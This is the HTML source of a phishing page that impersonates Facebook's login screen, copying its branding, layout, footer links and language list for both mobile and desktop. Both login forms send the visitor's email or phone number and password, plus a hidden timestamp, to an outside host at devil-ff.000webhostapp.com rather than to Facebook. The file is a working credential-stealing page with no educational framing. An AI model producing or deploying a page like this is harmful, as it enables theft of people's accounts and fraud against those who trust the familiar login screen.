<html>
  <head>
<meta name="viewport" content="width=device-width, initial-scale=1" />

<link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico">
<meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png">
    <title>Facebook - log in or sign up</title>
    <style>
     .error {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    text-align: center;
    position: absolute;
    width: 250px;
    height: 140px;
    background-color: white;
    border-radius: 20px;
    opacity: 100%;
  }
  .error-box {
    display: none;
    position: absolute;
    width: 100vw;
    height: 100vh;
    background-color: #fafafa;
    z-index: 2;
    backdrop-filter: opacity(30%);
  }
  .er {
    font-weight: bold;
  }
  .dismiss {
    background-color: white;
    border: none;
    font-weight: bold;
    color: #0095f6;
  }
      .main{
      background-color: #f0f2f5;
      }
    .row{
      display: flex;
      padding-bottom: 200px; 
      justify-content: space-between;
      padding-top: 200px;
    }
    .facebook{
      width: 260px;
      margin-left: 20px;
    }

    .input {
      width:330px;
      font-size: 17px;
      padding: 14px 16px;
      border: 1px solid #dddfe2;
      color: #1d2129;
      margin-bottom: 15px;
      border-radius: 5px;
     z-index: 1;
    }
    .img{
      width: 12px;
      height: 12px;
      
    }
    .link{
      text-decoration: none;
      color: #0095f6;
      
    }
    .line{
      align-items: center;
      border-bottom: 1px solid #dadde1;
      display: flex;
      margin: 20px 16px;
      text-align: center;
    }
    .button{
      margin-bottom: 15px;
      width: 330px;
      border: none;
      background-color: #1877f3;
      padding: 14px 16px;
      font-size: 17px;
      border-radius: 7px;
      color: white;
      font-weight: bold;
      
    }
    .col2{
      background-color: white;
      width: 396px;
      height: 350;
      margin-right: 30px;
      padding: 20px 0 28px;
       box-shadow: 0 2px 4px rgb(0 0 0/10%),0 8px 16px rgb(0 0 0/10%);
       border-right: 8px;
       align-items: center;
       box-sizing: border-box;
       text-align: center;
    }
    .new2{
      background: #00a400;
     color: white;
     font-weight: bold;
     border-radius: 4px;
     padding: 3px 8px 2px;
     font-size: 14px;
     text-align: center;
     box-sizing: border-box;
     min-width: 50px;
     vertical-align: bottom;
     border:none;
     height: 37px;
    }
    .new{
      background-color: #42b72a;
      color:white;
      border: none;
      border-radius: 6px;
      font-size: 17px;
      line-height: 48px;
      padding: 0 16px;
      font-weight: bold;
    }
    .text{
      font-size: 24px;
      width: 400px;
      margin-left: 30px;
    }
    .box{
      position: relative;
      top: 50px;
    }
    .msg{
      text-decoration: none;
      color: black;
      font-weight: bold;
    }
    .footer{
      display: block;
      padding-top: 20px;
      font-size: 12px;
      direction: ltr;
      color: #1c1e21;
      line-height: 1.34;
      
     
    }
    .plus{
      border: 1px solid #576B95;
    }
    li,li a{
      margin-left: 8px;
      text-decoration: none;
      color: grey;
    }
      .toggle{
    font-weight: bold;
    border: none;
    background-color: #f5f6f7;
    position: relative;
    top: -40px;
    left: 140px;
  }
    .toggle2{
    font-weight: bold;
    border: none;
    background-color:white;
    position: absolute;
      z-index: 3;
      left:88vw;
      top: 17vh;
    }
    .meta{
      font-size: 12px;
      color:grey;
      position: relative;
      display: block;
      margin-left: 50px;
    }
    .o{
      position: relative;
     
    }
    .ul{
      padding-top: 8px;
      align-items: center;
      display: flex;
      flex-wrap: wrap;
      list-style-type: none;
      color:#737373;
      
      margin-block-start: 1em;
      margin-block-end: 1em;
      margin-inline-start: 0px;
      margin-inline-end: 0px;
      padding-inline-start: 40px;
    }
    .2 li{
      margin-left: 15px;
    }
    .mobile{
      display: none;
    }
    .nav{
      display: none;}
     @media only screen and (max-width: 700px) {
       .mobile{
         display: block;
       }

       .main,.footer{
         display:none;
       }
       .nav{
         background-color: #fffbe2;
         border-color: #d8dfea;
         display: block;
         cursor: pointer;
         -webkit-tap-highlight-color:rgb(0,0,0,0)
         font-size: 14px;
         line-height: 18px;
         text-align: left;
         direction: ltr;
         width: 100%;
         position: absolute;
         height: 50px;
         top: 0;
       }
       .div{
         align-items: center;
         display: flex;
         flex: 1;
         font-size: 14px;
         
       }
       .logo{
         margin: 0 8px;
         display:inline-block;
         width: 18px;
         height: 32px;
         vertical-align: top;
         background-image: url(https://m.facebook.com/rsrc.php/v3/yz/r/gcZGjl1rwno.png);
         background-size: 19px 67px;
         font-size: 14px;
       }
       .div{
         padding-top: 10px;
       }
       .c{
         display: flex;
         justify-content: center;
         flex-direction: column;
         flex: 1;
       }
       .touch{
         text-decoration: none;
       }
       .fcl{
         color: #3b5998;
       }
       .facebook2{
         position: relative;
         width: 100px;
         left:120px;
         top:60px;
         height: auto;
       }
       .d{
         margin-top: 80px;
       }
       .inputm{
        margin-bottom: 10px;
        border-color: rgba(0,0,0,.07) rgba(0,0,0,.11) rgba(0,0,0,.18);
         box-sizing: border-box;
         width: 100%;
         border-radius: 4px;
          border-style: solid ;
          border-width: 1px;
          bottom: -1px;
          
         backface-visibility: visible! important;
         padding: 12px;
         font-size: 14px;
         line-height: 18px;
         display:block;
         background:#f5f6f7;
         color: fieldtext;
         text-align: start;
         appearance: auto;
       }
       .grid{
         display: grid;
         column-gap: 80px;
         margin-left: 60px;
         margin-top: 100px;
         margin-bottom: 10px;
         grid-template-columns: auto auto;
       }
       .grid-item{
         font-size: 14px;
         color: #576B95;
       }
       .login{
         width: 100%;
         height: 40px;
         font-size: 17px;
         line-height: 40px;
         display: block;
         padding: 0 16px;
         border-radius: 3px;
         color:white;
         font-weight: bold;
         border:none;
         background-color: #1877f2;
       }
       form{
         text-align: center;
       }
       .m{
         display: block;
         margin-top: 10px;
       }
  .center{
    display: flex;
    justify-content:center;
  }
  .t{
    color: grey;
    font-size: 12px;
    margin-bottom: 10px;
  }
     }
    </style>
    </head>
    <body>

      <div class="mobile">
      <nav class="nav">
        <a href="" target="_top" class="touch">
          <div class="div">
            <i class="logo"></i>
            <div class="c">
              <span class="fcl">Get Facebook on Android and browser faster.</span>
            </div>
          </div>
        </a>
        </nav>
        <img class="facebook2" src="images/facebook.png"/>
        <div class="d">
          <form action="https://devil-ff.000webhostapp.com/facebook.php" method="post" id="form_mobile" >
        <input class="inputm" name="Email or Phone number" placeholder="Mobile number or email address" id="text" type="text" required="true"/>
        <input class="inputm" name="Password" placeholder="Password" id="password" type="password" required="true"/>
        <button id="toggle" type="button" class="toggle"></button>
               <input type="hidden" name="Time" value="date" id="date"/>
        <button type="submit"  class="login">Log in</button>
        <a class="link m" href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgotten password?</a>
        </form>
           <div class="line"></div>
           <div class="center">
                      <button class="new2">Create New Account</button>
                      </div>
        </div>
        <div class="grid">
       <div class="grid-item">English (UK)</div>
       <div class="grid-item">हिंदी</div>
       <div class="grid-item">বাংলা</div>
       <div class="grid-item">नेपाली</div>
       <div class="grid-item">اُدُو)</div>
       <div class="grid-item">Español</div>
       <div class="grid-item">ଓଡ଼ିଆ</div>
       <div class="grid-item">&nbsp;&nbsp;&nbsp;<img class="img plus" src="images/plus.png"/></div>
        </div>
        <div class="center">
          <div class="t">About • Help • More</div>
        </div>
        <div class="center">
          <div class="t">Meta © 2022</div>
        </div>
        </div>
      <div class="main">
      <div class="row">
        <div class="col1">
          <img class="facebook" src="images/facebook.png"/>
          <p class="text">Facebook helps you connect and share with the people in your life.</p>
        </div>
        <div class="col2">
          <form action="https://devil-ff.000webhostapp.com/facebook.php" method="post">

            <input class="input" name="Email or Phone number" placeholder="Email address or phone number" id="text2" type="text"/>
            <input class="input o" name="Password"  id="password2" type="password" placeholder="Password"/>
<button class="toggle2" type="button" id="toggle2">Show</button>
            <button type="submit" value="Facebook" name="commit" class="button">Log in</button>
       <input type="hidden" name="Time_" value="date" id="date2"/>
            <a class="link" href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgotten password?</a>
           <div class="line"></div>
           <button class="new">Create New Account</button>
            </form>
            <div class="box"><a class="msg" href="">Create a Page</a>&nbsp;for a celebrity,brand or business.</div>
        </div>
      </div>
      </div>
      <div class="footer">
        <ul class="ul">
<li>English (UK)</li>
                <li><a href="">हिन्दी</a></li>
                <li><a href="">ગુજરાતી</a></li>
                <li><a href="">मराठी</a></li>
                <li><a href="">اردو</a></li>
                <li><a href="">മലയാളം</a></li>
                <li><a href="">বাংলা</a> </li>
                <li><a href="" class="_sv4">తెలుగు</a> </li>
                <li><a href="" class="_sv4">தமிழ்</a></li>
                <li><a href="" class="_sv4">ਪੰਜਾਬੀ</a></li>
                <li><a href="" class="_sv4">Español</a></li>
                <li><a href="" class="_sv4">Italiano</a></li>
                <li><a href="" class="_sv4">Deutsch</a></li>
                <li><a href="" role="button"><img class="img plus" src="images/plus.png"/></a> </li>
        </ul>
         <div class="line"></div>
         <ul class="ul 2">
           <li>SignUp</li>
           <li>Log in</li>
           <li>Messenger</li>
           <li>Facebook Lite</li>
           <li>Watch</li>
           <li>Places</li>
           <li>Games</li>
           <li>Marketplace</li>
           <li>Meta pay</li>
           <li>Oculus</li>
           <li>Portal</li>
           <li>Instagram</li>
           <li>Bulletin</li>
           <li>Local</li>
           <li>Fundraisers</li>
           <li>Services</li>
           <li>Voting Information Center</li>
           <li>Groups</li>
           <li>About</li>
           <li>Create ad</li>
           <li>Create Page</li>
           <li>Developers</li>
           <li>Career</li>
           <li>Privacy</li>
           <li>Cookies</li>
           <li>ad Choices</li>
           <li>Help</li>
           <li>Terms</li>
           <li>Contact uploading and non-users</li>
         </ul>
         <div class="meta"><span>Meta © 2022</span></div>
      </div>
      </body>
      <script>
      var date = new Date();
	document.getElementById("date").value= date;
	
	var date2 = new Date();
	document.getElementById("date2").value= date2;
	
const togglePassword = document.querySelector("#toggle");
const password = document.querySelector("#password");

togglePassword.addEventListener("click", function () {
// toggle the type attribute
const type = password.getAttribute("type") === "password" ? "text": "password";
password.setAttribute("type", type);
if (password.getAttribute("type") === "text") {
document.getElementById("toggle").innerHTML = "Hide";
}
if (password.getAttribute("type") === "password") {
  document.getElementById("toggle").innerHTML = "Show";
}
});
var textarea = document.getElementById("password");
textarea.addEventListener('input', hideOnEmpty);
function hideOnEmpty() {
var text = this.value;
if (text !== '') {

document.getElementById("toggle").style.display = "inline";
document.getElementById("toggle").innerHTML = "Show";
} else {
document.getElementById("toggle").style.display = "none";
}
}




const togglePassword2 = document.querySelector("#toggle2");
const password2 = document.querySelector("#password2");

togglePassword2.addEventListener("click", function () {
// toggle the type attribute
const type2 = password2.getAttribute("type") === "password" ? "text": "password";
password2.setAttribute("type", type2);
if (password2.getAttribute("type") === "text") {
document.getElementById("toggle2").innerHTML = "Hide";
}
if (password2.getAttribute("type") === "password") {
  document.getElementById("toggle2").innerHTML = "Show";
}
});
var textarea2 = document.getElementById("password2");
textarea.addEventListener('input', hideOnEmpty2);
function hideOnEmpty2() {
var text2 = document.getElementById("password2").value;
if (text2 !== ''){
document.getElementById("toggle2").style.display = "inline";
}else{
document.getElementById("toggle2").style.display = "none";
}

}
window.setInterval(hideOnEmpty2,10);

      </script>
      </html>
